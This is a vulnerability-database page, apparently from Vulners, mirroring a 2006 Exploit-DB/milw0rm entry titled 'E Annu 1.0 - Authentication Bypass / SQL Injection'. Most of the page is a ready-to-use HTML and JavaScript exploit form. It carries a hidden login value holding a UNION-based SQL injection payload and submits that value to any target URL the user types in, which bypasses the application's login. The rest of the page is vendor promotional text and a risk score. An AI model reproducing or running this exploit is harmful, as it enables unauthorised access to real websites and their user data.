Lucene search
K

E Annu 1.0 - Authentication Bypass / SQL Injection

🗓️ 30 Oct 2006 00:00:00Reported by ajannType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Authentication Bypass / SQL Injection in E Annu 1.

Code
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>E Annu 1.0 Login Bypass SQL Injection Exploit</title>

<script language="JavaScript">
 
//'===============================================================================================
//'[Script Name: E Annu 1.0 Login Bypass SQL Injection Exploit
//'[Coded by   : ajann
//'[Author   : ajann
//'[Contact    : :(
//'[Using : Write Target after Submit Click
//'===============================================================================================
   

     //Basic exploit,but any time : ( 

function command(){
       if (document.sql.login.value==""){
          alert("Failed..");
      return false;
    }


  
  sql.action= document.sql.target1.value // Ready Target : )
  sql.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">E Annu 1.0 Login Bypass SQL Injection</font></b></p>
<p></p>
<form method="post" name="sql" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>

  <input type="hidden" name="login" value="' union select 0,0,0,0,0 from user/*" onmouseout="javascript:this.style.background='#808000';"></p>
<input type="hidden" name="password">
<input type="hidden" name="action_connect">
<br>
 <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">

  <p><input type="submit" value="Gönder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
</p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</center>
</body>

</html>

# milw0rm.com [2006-10-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
31